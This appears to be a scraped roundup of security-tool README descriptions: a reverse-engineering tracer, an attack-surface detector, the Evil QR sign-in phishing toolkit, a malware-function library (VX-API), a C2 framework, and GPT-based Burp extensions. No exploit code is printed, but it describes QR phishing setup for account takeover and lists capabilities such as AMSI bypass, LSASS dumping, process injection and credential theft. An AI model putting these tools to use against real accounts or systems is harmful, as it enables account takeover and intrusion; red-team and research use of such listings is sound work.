    For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer tiny_runner.sh for more information. Detailed description available here.

    Usage

     Details about the usage you will find on the project's Wiki.

    WARNINGS

    • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
    • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
    • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.


    Questions? Ideas? Join Discussions!



    Noir - An Attack Surface Detector Form Source Code

    By: Zion3R


    Noir is an attack surface detector form source code.

    Key Features

    • Automatically identify language and framework from source code.
    • Find API endpoints and web pages through code analysis.
    • Load results quickly through interactions with proxy tools such as ZAP, Burpsuite, Caido and More Proxy tools.
    • That provides structured data such as JSON and HAR for identified Attack Surfaces to enable seamless interaction with other tools. Also provides command line samples to easily integrate and collaborate with other tools, such as curls or httpie.

    Available Support Scope

    Endpoint's Entities

    • Path
    • Method
    • Param
    • Header
    • Protocol (e.g ws)

    Languages and Frameworks

    Language Framework URL Method Param Header WS
    Go Echo
    X X X
    Python Django
    X X X X
    Python Flask X X X X
    Ruby Rails
    X X
    Ruby Sinatra
    X X
    Php
    X X
    Java Spring
    X X X
    Java Jsp X X X X X
    Crystal Kemal
    X
    JS Express
    X X X
    JS Next X X X X X

    Specification

    Specification Format URL Method Param Header WS
    Swagger JSON
    X X
    Swagger YAML
    X X

    Installation

    Homebrew (macOS)

    brew tap hahwul/noir
    brew install noir

    From Sources

    # Install Crystal-lang
    # https://crystal-lang.org/install/

    # Clone this repo
    git clone https://github.com/hahwul/noir
    cd noir

    # Install Dependencies
    shards install

    # Build
    shards build --release --no-debug

    # Copy binary
    cp ./bin/noir /usr/bin/

    Docker (GHCR)

    docker pull ghcr.io/hahwul/noir:main

    Usage

    Usage: noir <flags>
    Basic:
    -b PATH, --base-path ./app (Required) Set base path
    -u URL, --url http://.. Set base url for endpoints
    -s SCOPE, --scope url,param Set scope for detection

    Output:
    -f FORMAT, --format json Set output format [plain/json/markdown-table/curl/httpie]
    -o PATH, --output out.txt Write result to file
    --set-pvalue VALUE Specifies the value of the identified parameter
    --no-color Disable color output
    --no-log Displaying only the results

    Deliver:
    --send-req Send the results to the web request
    --send-proxy http://proxy.. Send the results to the web request via http proxy

    Technologies:
    -t TECHS, --techs rails,php Set technologies to use
    --exclude-techs rails,php Specify the technologies to be excluded
    --list-techs Show all technologies

    Others:
    -d, --debug Show debug messages
    -v, --version Show version
    -h, --help Show help

    Example

    noir -b . -u https://testapp.internal.domains

    JSON Result

    noir -b . -u https://testapp.internal.domains -f json
    [
    ...
    {
    "headers": [],
    "method": "POST",
    "params": [
    {
    "name": "article_slug",
    "param_type": "json",
    "value": ""
    },
    {
    "name": "body",
    "param_type": "json",
    "value": ""
    },
    {
    "name": "id",
    "param_type": "json",
    "value": ""
    }
    ],
    "protocol": "http",
    "url": "https://testapp.internal.domains/comments"
    }
    ]



    Evil QR - Proof-of-concept To Demonstrate Dynamic QR Swap Phishing Attacks In Practice

    By: Zion3R


    Toolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing.

    It consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.

    Watch the demo video:

    Read more about it on my blog: https://breakdev.org/evilqr-phishing


    Configuration

    The parameters used by Evil QR are hardcoded into extension and server source code, so it is important to change them to use custom values, before you build and deploy the toolkit.

    parameter description default value
    API_TOKEN API token used to authenticate with REST API endpoints hosted on the server 00000000-0000-0000-0000-000000000000
    QRCODE_ID QR code ID used to bind the extracted QR code with the one displayed on the phishing page 11111111-1111-1111-1111-111111111111
    BIND_ADDRESS IP address with port the HTTP server will be listening on 127.0.0.1:35000
    API_URL External URL pointing to the server, where the phishing page will be hosted http://127.0.0.1:35000

    Here are all the places in the source code, where the values should be modified:

    server/core/config.go:

    server/templates/index.html:
    extension/background.js:
    Installation

    Extension

    You can load the extension in Chrome, through Load unpacked feature: https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

    Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.

    Server

    Make sure you have Go installed version at least 1.20.

    To build go to /server directory and run the command:

    Windows:

    build_run.bat

    Linux:

    chmod 700 build.sh
    ./build.sh

    Built server binaries will be placed in the ./build/ directory.

    Usage

    1. Run the server by running the built server binary: ./server/build/evilqr-server
    2. Open any of the supported websites in your Chrome browser, with installed Evil QR extension:
    https://discord.com/login
    https://web.telegram.org/k/
    https://whatsapp.com
    https://store.steampowered.com/login/
    https://accounts.binance.com/en/login
    https://www.tiktok.com/login
    1. Make sure the sign-in QR code is visible and click the Evil QR extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.
    2. Open the server's phishing page URL: http://127.0.0.1:35000 (default)

    License

    Evil QR is made by Kuba Gretzky (@mrgretzky) and it's released under MIT license.



    AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

    By: Zion3R


    AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

    We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.


    Problems an Exercise Planner faces:

    • Constant table-top research to have fresh content
    • Realistic CSE scenario creation can be difficult and time-consuming
    • Meeting objectives but also keeping it appealing for the target audience
    • Is the relevance and timeliness aspects considered?
    • Can all the above be automated?

    Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

    Release Roadmap

    The updated project, AiCEF v.2.0 is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functinality will start being release by early June 2023. Thank you for your patience.

    Installation

    The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.

    First, make sure you have docker-compose installed in your environment:

    Linux:

    $ sudo apt-get install docker-compose

    Then, clone the repository:

    $ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
    $ cd /<choose-a-path>/AiCEF-docker

    Configure the environment settings

    Import the MySQL file in your

    $ mysql -u <your_username> –-password=<your_password> AiCEF_db < AiCEF_db.sql 

    Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

    $ cp .env.sample .env

    Run AiCEF

    Note: Make sure you have an OpenAI API key available. Load the environment setttings (including your MySQL connection details):

    set -a ; source .env

    Finally, run docker-compose in detached (-d) mode:

    $ sudo docker-compose up -d

    Usage

    A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.

    Find below some sample usage screenshots:

    Features

    • An AI-powered Cyber Exercise Generation Framework
    • Developed in Python & EEL
    • Open source library Stixview
    • Stores data in MYSQL
    • API to Text Synthesis Models (ex. GPT-3.5)
    • Can create incidents based on TTPs of 125 known APT actors
    • Models Cyber Exercise Content in machine readable STIX2.1 [2] (.json) and human readable format (.pdf)

    Authors

    AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

    References

    [1] https://link.springer.com/article/10.1007/s10207-023-00693-z

    [2] https://oasis-open.github.io/cti-documentation/stix/intro.html

    Contributing

    Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

    1. Fork this repository
    2. Create a new branch (git checkout -b feature/your-branch-name)
    3. Make your changes and commit them (git commit -m 'Add some feature')
    4. Push to the branch (git push origin feature/your-branch-name)
    5. Open a new pull request

    License

    AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.

    Under the following terms:

    Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. NonCommercial — You may not use the material for commercial purposes. No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



    VX-API - Collection Of Various Malicious Functionality To Aid In Malware Development

    By: Zion3R

     


    The VX-API is a collection of malicious functionality to aid in malware development. It is recommended you clone and/or download this entire repo then open the Visual Studio solution file to easily explore functionality and concepts.

    Some functions may be dependent on other functions present within the solution file. Using the solution file provided here will make it easier to identify which other functionality and/or header data is required.

    You're free to use this in any manner you please. You do not need to use this entire solution for your malware proof-of-concepts or Red Team engagements. Strip, copy, paste, delete, or edit this projects contents as much as you'd like.


    List of features

    Anti-debug

    Function Name Original Author
    AdfCloseHandleOnInvalidAddress Checkpoint Research
    AdfIsCreateProcessDebugEventCodeSet Checkpoint Research
    AdfOpenProcessOnCsrss Checkpoint Research
    CheckRemoteDebuggerPresent2 ReactOS
    IsDebuggerPresentEx smelly__vx
    IsIntelHardwareBreakpointPresent Checkpoint Research

    Cryptography Related

    Function Name Original Author
    HashStringDjb2 Dan Bernstein
    HashStringFowlerNollVoVariant1a Glenn Fowler, Landon Curt Noll, and Kiem-Phong Vo
    HashStringJenkinsOneAtATime32Bit Bob Jenkins
    HashStringLoseLose Brian Kernighan and Dennis Ritchie
    HashStringRotr32 T. Oshiba (1972)
    HashStringSdbm Ozan Yigit
    HashStringSuperFastHash Paul Hsieh
    HashStringUnknownGenericHash1A Unknown
    HashStringSipHash RistBS
    HashStringMurmur RistBS
    CreateMd5HashFromFilePath Microsoft
    CreatePseudoRandomInteger Apple (c) 1999
    CreatePseudoRandomString smelly__vx
    HashFileByMsiFileHashTable smelly__vx
    CreatePseudoRandomIntegerFromNtdll smelly__vx
    LzMaximumCompressBuffer smelly__vx
    LzMaximumDecompressBuffer smelly__vx
    LzStandardCompressBuffer smelly__vx
    LzStandardDecompressBuffer smelly__vx
    XpressHuffMaximumCompressBuffer smelly__vx
    XpressHuffMaximumDecompressBuffer smelly__vx
    XpressHuffStandardCompressBuffer smelly__vx
    XpressHuffStandardDecompressBuffer smelly__vx
    XpressMaximumCompressBuffer smelly__vx
    XpressMaximumDecompressBuffer smelly__vx
    XpressStandardCompressBuffer smelly__vx
    XpressStandardDecompressBuffer smelly__vx
    ExtractFilesFromCabIntoTarget smelly__vx

    Error Handling

    Function Name Original Author
    GetLastErrorFromTeb smelly__vx
    GetLastNtStatusFromTeb smelly__vx
    RtlNtStatusToDosErrorViaImport ReactOS
    GetLastErrorFromTeb smelly__vx
    SetLastErrorInTeb smelly__vx
    SetLastNtStatusInTeb smelly__vx
    Win32FromHResult Raymond Chen

    Evasion

    Function Name Original Author
    AmsiBypassViaPatternScan ZeroMemoryEx
    DelayedExecutionExecuteOnDisplayOff am0nsec and smelly__vx
    HookEngineRestoreHeapFree rad9800
    MasqueradePebAsExplorer smelly__vx
    RemoveDllFromPeb rad9800
    RemoveRegisterDllNotification Rad98, Peter Winter-Smith
    SleepObfuscationViaVirtualProtect 5pider
    RtlSetBaseUnicodeCommandLine TheWover

    Fingerprinting

    Function Name Original Author
    GetCurrentLocaleFromTeb 3xp0rt
    GetNumberOfLinkedDlls smelly__vx
    GetOsBuildNumberFromPeb smelly__vx
    GetOsMajorVersionFromPeb smelly__vx
    GetOsMinorVersionFromPeb smelly__vx
    GetOsPlatformIdFromPeb smelly__vx
    IsNvidiaGraphicsCardPresent smelly__vx
    IsProcessRunning smelly__vx
    IsProcessRunningAsAdmin Vimal Shekar
    GetPidFromNtQuerySystemInformation smelly__vx
    GetPidFromWindowsTerminalService modexp
    GetPidFromWmiComInterface aalimian and modexp
    GetPidFromEnumProcesses smelly__vx
    GetPidFromPidBruteForcing modexp
    GetPidFromNtQueryFileInformation modexp, Lloyd Davies, Jonas Lyk
    GetPidFromPidBruteForcingExW smelly__vx, LLoyd Davies, Jonas Lyk, modexp

    Helper Functions

    Function Name Original Author
    CreateLocalAppDataObjectPath smelly__vx
    CreateWindowsObjectPath smelly__vx
    GetCurrentDirectoryFromUserProcessParameters smelly__vx
    GetCurrentProcessIdFromTeb ReactOS
    GetCurrentUserSid Giovanni Dicanio
    GetCurrentWindowTextFromUserProcessParameter smelly__vx
    GetFileSizeFromPath smelly__vx
    GetProcessHeapFromTeb smelly__vx
    GetProcessPathFromLoaderLoadModule smelly__vx
    GetProcessPathFromUserProcessParameters smelly__vx
    GetSystemWindowsDirectory Geoff Chappell
    IsPathValid smelly__vx
    RecursiveFindFile Luke
    SetProcessPrivilegeToken Microsoft
    IsDllLoaded smelly__vx
    TryLoadDllMultiMethod smelly__vx
    CreateThreadAndWaitForCompletion smelly__vx
    GetProcessBinaryNameFromHwndW smelly__vx
    GetByteArrayFromFile smelly__vx
    Ex_GetHandleOnDeviceHttpCommunication x86matthew
    IsRegistryKeyValid smelly__vx
    FastcallExecuteBinaryShellExecuteEx smelly__vx
    GetCurrentProcessIdFromOffset RistBS
    GetPeBaseAddress smelly__vx
    LdrLoadGetProcedureAddress c5pider
    IsPeSection smelly__vx
    AddSectionToPeFile smelly__vx
    WriteDataToPeSection smelly__vx
    GetPeSectionSizeInByte smelly__vx
    ReadDataFromPeSection smelly__vx
    GetCurrentProcessNoForward ReactOS
    GetCurrentThreadNoForward ReactOS

    Library Loading

    Function Name Original Author
    GetKUserSharedData Geoff Chappell
    GetModuleHandleEx2 smelly__vx
    GetPeb 29a
    GetPebFromTeb ReactOS
    GetProcAddress 29a Volume 2, c5pider
    GetProcAddressDjb2 smelly__vx
    GetProcAddressFowlerNollVoVariant1a smelly__vx
    GetProcAddressJenkinsOneAtATime32Bit smelly__vx
    GetProcAddressLoseLose smelly__vx
    GetProcAddressRotr32 smelly__vx
    GetProcAddressSdbm smelly__vx
    GetProcAddressSuperFastHash smelly__vx
    GetProcAddressUnknownGenericHash1 smelly__vx
    GetProcAddressSipHash RistBS
    GetProcAddressMurmur RistBS
    GetRtlUserProcessParameters ReactOS
    GetTeb ReactOS
    RtlLoadPeHeaders smelly__vx
    ProxyWorkItemLoadLibrary Rad98, Peter Winter-Smith
    ProxyRegisterWaitLoadLibrary Rad98, Peter Winter-Smith

    Lsass Dumping

    Function Name Original Author
    MpfGetLsaPidFromServiceManager modexp
    MpfGetLsaPidFromRegistry modexp
    MpfGetLsaPidFromNamedPipe modexp

    Network Connectivity

    Function Name Original Author
    UrlDownloadToFileSynchronous Hans Passant
    ConvertIPv4IpAddressStructureToString smelly__vx
    ConvertIPv4StringToUnsignedLong smelly__vx
    SendIcmpEchoMessageToIPv4Host smelly__vx
    ConvertIPv4IpAddressUnsignedLongToString smelly__vx
    DnsGetDomainNameIPv4AddressAsString smelly__vx
    DnsGetDomainNameIPv4AddressUnsignedLong smelly__vx
    GetDomainNameFromUnsignedLongIPV4Address smelly__vx
    GetDomainNameFromIPV4AddressAsString smelly__vx

    Other

    Function Name Original Author
    OleGetClipboardData Microsoft
    MpfComVssDeleteShadowVolumeBackups am0nsec
    MpfComModifyShortcutTarget Unknown
    MpfComMonitorChromeSessionOnce smelly__vx
    MpfExtractMaliciousPayloadFromZipFileNoPassword Codu

    Process Creation

    Function Name Original Author
    CreateProcessFromIHxHelpPaneServer James Forshaw
    CreateProcessFromIHxInteractiveUser James Forshaw
    CreateProcessFromIShellDispatchInvoke Mohamed Fakroud
    CreateProcessFromShellExecuteInExplorerProcess Microsoft
    CreateProcessViaNtCreateUserProcess CaptMeelo
    CreateProcessWithCfGuard smelly__vx and Adam Chester
    CreateProcessByWindowsRHotKey smelly__vx
    CreateProcessByWindowsRHotKeyEx smelly__vx
    CreateProcessFromINFSectionInstallStringNoCab smelly__vx
    CreateProcessFromINFSetupCommand smelly__vx
    CreateProcessFromINFSectionInstallStringNoCab2 smelly__vx
    CreateProcessFromIeFrameOpenUrl smelly__vx
    CreateProcessFromPcwUtil smelly__vx
    CreateProcessFromShdocVwOpenUrl smelly__vx
    CreateProcessFromShell32ShellExecRun smelly__vx
    MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc aaaddress1
    CreateProcessFromWmiWin32_ProcessW CIA
    CreateProcessFromZipfldrRouteCall smelly__vx
    CreateProcessFromUrlFileProtocolHandler smelly__vx
    CreateProcessFromUrlOpenUrl smelly__vx
    CreateProcessFromMsHTMLW smelly__vx

    Process Injection

    Function Name Original Author
    MpfPiControlInjection SafeBreach Labs
    MpfPiQueueUserAPCViaAtomBomb SafeBreach Labs
    MpfPiWriteProcessMemoryCreateRemoteThread SafeBreach Labs
    MpfProcessInjectionViaProcessReflection Deep Instinct

    Proxied Functions

    Function Name Original Author
    IeCreateFile smelly__vx
    CopyFileViaSetupCopyFile smelly__vx
    CreateFileFromDsCopyFromSharedFile Jonas Lyk
    DeleteDirectoryAndSubDataViaDelNode smelly__vx
    DeleteFileWithCreateFileFlag smelly__vx
    IsProcessRunningAsAdmin2 smelly__vx
    IeCreateDirectory smelly__vx
    IeDeleteFile smelly__vx
    IeFindFirstFile smelly__vx
    IEGetFileAttributesEx smelly__vx
    IeMoveFileEx smelly__vx
    IeRemoveDirectory smelly__vx

    Shellcode Execution

    Function Name Original Author
    MpfSceViaImmEnumInputContext alfarom256, aahmad097
    MpfSceViaCertFindChainInStore alfarom256, aahmad097
    MpfSceViaEnumPropsExW alfarom256, aahmad097
    MpfSceViaCreateThreadpoolWait alfarom256, aahmad097
    MpfSceViaCryptEnumOIDInfo alfarom256, aahmad097
    MpfSceViaDSA_EnumCallback alfarom256, aahmad097
    MpfSceViaCreateTimerQueueTimer alfarom256, aahmad097
    MpfSceViaEvtSubscribe alfarom256, aahmad097
    MpfSceViaFlsAlloc alfarom256, aahmad097
    MpfSceViaInitOnceExecuteOnce alfarom256, aahmad097
    MpfSceViaEnumChildWindows alfarom256, aahmad097, wra7h
    MpfSceViaCDefFolderMenu_Create2 alfarom256, aahmad097, wra7h
    MpfSceViaCertEnumSystemStore alfarom256, aahmad097, wra7h
    MpfSceViaCertEnumSystemStoreLocation alfarom256, aahmad097, wra7h
    MpfSceViaEnumDateFormatsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDesktopWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumDesktopsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDirTreeW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDisplayMonitors alfarom256, aahmad097, wra7h
    MpfSceViaEnumFontFamiliesExW alfarom256, aahmad097, wra7h
    MpfSceViaEnumFontsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumLanguageGroupLocalesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumObjects alfarom256, aahmad097, wra7h
    MpfSceViaEnumResourceTypesExW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemCodePagesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemGeoID alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemLanguageGroupsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemLocalesEx alfarom256, aahmad097, wra7h
    MpfSceViaEnumThreadWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumTimeFormatsEx alfarom256, aahmad097, wra7h
    MpfSceViaEnumUILanguagesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumWindowStationsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumerateLoadedModules64 alfarom256, aahmad097, wra7h
    MpfSceViaK32EnumPageFilesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumPwrSchemes alfarom256, aahmad097, wra7h
    MpfSceViaMessageBoxIndirectW alfarom256, aahmad097, wra7h
    MpfSceViaChooseColorW alfarom256, aahmad097, wra7h
    MpfSceViaClusWorkerCreate alfarom256, aahmad097, wra7h
    MpfSceViaSymEnumProcesses alfarom256, aahmad097, wra7h
    MpfSceViaImageGetDigestStream alfarom256, aahmad097, wra7h
    MpfSceViaVerifierEnumerateResource alfarom256, aahmad097, wra7h
    MpfSceViaSymEnumSourceFiles alfarom256, aahmad097, wra7h

    String Manipulation

    Function Name Original Author
    ByteArrayToCharArray smelly__vx
    CharArrayToByteArray smelly__vx
    ShlwapiCharStringToWCharString smelly__vx
    ShlwapiWCharStringToCharString smelly__vx
    CharStringToWCharString smelly__vx
    WCharStringToCharString smelly__vx
    RtlInitEmptyUnicodeString ReactOS
    RtlInitUnicodeString ReactOS
    CaplockString simonc
    CopyMemoryEx ReactOS
    SecureStringCopy Apple (c) 1999
    StringCompare Apple (c) 1999
    StringConcat Apple (c) 1999
    StringCopy Apple (c) 1999
    StringFindSubstring Apple (c) 1999
    StringLength Apple (c) 1999
    StringLocateChar Apple (c) 1999
    StringRemoveSubstring smelly__vx
    StringTerminateStringAtChar smelly__vx
    StringToken Apple (c) 1999
    ZeroMemoryEx ReactOS
    ConvertCharacterStringToIntegerUsingNtdll smelly__vx
    MemoryFindMemory KamilCuk

    UAC Bypass

    Function Name Original Author
    UacBypassFodHelperMethod winscripting.blog

    Rad98 Hooking Engine

    Function Name Original Author
    InitHardwareBreakpointEngine rad98
    ShutdownHardwareBreakpointEngine rad98
    ExceptionHandlerCallbackRoutine rad98
    SetHardwareBreakpoint rad98
    InsertDescriptorEntry rad98
    RemoveDescriptorEntry rad98
    SnapshotInsertHardwareBreakpointHookIntoTargetThread rad98

    Generic Shellcode

    Function Name Original Author
    GenericShellcodeHelloWorldMessageBoxA SafeBreach Labs
    GenericShellcodeHelloWorldMessageBoxAEbFbLoop SafeBreach Labs
    GenericShellcodeOpenCalcExitThread MsfVenom


    ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

    By: Zion3R


    ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

    Once installed, ReconAIzer add a contextual menu and a dedicated tab to see the results:


    Prerequisites

    • Burp Suite
    • Jython Standalone Jar

    Installation

    Follow these steps to install the ReconAIzer extension on Burp Suite:

    Step 1: Download Jython

    1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
    2. Save the Jython Standalone Jar file in a convenient location on your computer.

    Step 2: Configure Jython in Burp Suite

    1. Open Burp Suite.
    2. Go to the "Extensions" tab.
    3. Click on the "Extensions settings" sub-tab.
    4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
    5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
    6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

    Step 3: Download and Install ReconAIzer

    1. Download the latest release of ReconAIzer
    2. Open Burp Suite
    3. Go back to the "Extensions" tab in Burp Suite.
    4. Click the "Add" button.
    5. In the "Add extension" dialog, select "Python" as the "Extension type."
    6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
    7. Make sure the "Load" checkbox is selected and click the "Next" button.
    8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

    Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

    Once it's done, you must configure your OpenAI API key on the "Config" tab under "ReconAIzer" tab.

    Feel free to suggest prompts improvements or anything you would like to see on ReconAIzer!

    Happy bug hunting!



    HardHatC2 - A C# Command And Control Framework

    By: Zion3R


    A cross-platform, collaborative, Command & Control framework written in C#, designed for red teaming and ease of use.

    HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
    It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.


    Release Tracking

    Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.

    Community

    Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.

    Features

    Teamserver & Client

    • Per-operator accounts with account tiers to allow customized access control and features, including view-only guest modes, team-lead opsec approval(WIP), and admin accounts for general operation management.
    • Managers (Listeners)
    • Dynamic Payload Generation (Exe, Dll, shellcode, PowerShell command)
    • Creation & editing of C2 profiles on the fly in the client
    • Customization of payload generation
      • sleep time/jitter
      • kill date
      • working hours
      • type (Exe, Dll, Shellcode, ps command)
      • Included commands(WIP)
      • option to run confuser
    • File upload & Downloads
    • Graph View
    • File Browser GUI
    • Event Log
    • JSON logging for events & tasks
    • Loot tracking (Creds, downloads)
    • IOC tracing
    • Pivot proxies (SOCKS 4a, Port forwards)
    • Cred store
    • Autocomplete command history
    • Detailed help command
    • Interactive bash terminal command if the client is on linux or powershell on windows, this allows automatic parsing and logging of terminal commands like proxychains
    • Persistent database storage of teamserver items (User accounts, Managers, Engineers, Events, tasks, creds, downloads, uploads, etc. )
    • Recon Entity Tracking (track info about users/devices, random metadata as needed)
    • Shared files for some commands (see teamserver page for details)
    • tab-based interact window for command issuing
    • table-based output option for some commands like ls, ps, etc.
    • Auto parsing of output from seatbelt to create "recon entities" and fill entries to reference back to later easily
    • Dark and Light
      theme

    Engineers

    • C# .NET framework implant for windows devices, currently only CLR/.NET 4 support
    • atm only one implant, but looking to add others
    • It can be generated as EXE, DLL, shellcode, or PowerShell stager
    • Rc4 encryption of payload memory & heap when sleeping (Exe / DLL only)
    • AES encryption of all network communication
    • ConfuserEx integration for obfuscation
    • HTTP, HTTPS, TCP, SMB communication
      • TCP & SMB can work P2P in a bind or reverse setups
    • Unique per implant key generated at compile time
    • multiple callback URI's depending on the C2 profile
    • P/Invoke & D/Invoke integration for windows API calls
    • SOCKS 4a support
    • Reverse Port Forward & Port Forwards
    • All commands run as async cancellable jobs
      • Option to run commands sync if desired
    • Inline assembly execution & inline shellcode execution
    • DLL Injection
    • Execute assembly & Mimikatz integration
    • Mimikatz is not built into the implant but is pushed when specific commands are issued
    • Various localhost & network enumeration tools
    • Token manipulation commands
      • Steal Token Mask(WIP)
    • Lateral Movement Commands
    • Jump (psexec, wmi, wmi-ps, winrm, dcom)
    • Remote Execution (WIP)
    • AMSI & ETW Patching
    • Unmanaged Powershell
    • Script Store (can load multiple scripts at once if needed)
    • Spawn & Inject
      • Spawn-to is configurable
    • run, shell & execute

    Documentation

    documentation can be found at docs

    Getting Started

    Prerequisites

    • Installation of the .net 7 SDK from Microsoft
    • Once installed, the teamserver and client are started with dotnet run

    Teamserver

    To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/

    HardHat Client

    1. When starting the client to set the target teamserver location, include it in the command line dotnet run https://127.0.0.1:5000 for example
    2. open a web browser and navigate to https://localhost:7096/ if this works, you should see the login page
    3. Log in with the HardHat_Admin user (Password is printed on first TeamServer startup)
    4. Navigate to the settings page & create a new user if successful, a message should appear, then you may log in with that account to access the full client

    Contributions & Bug Reports

    Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.



    Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

    By: Zion3R


    burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

    The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

    [!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

    [!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

    [!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.

     

    Features

    • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
    • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
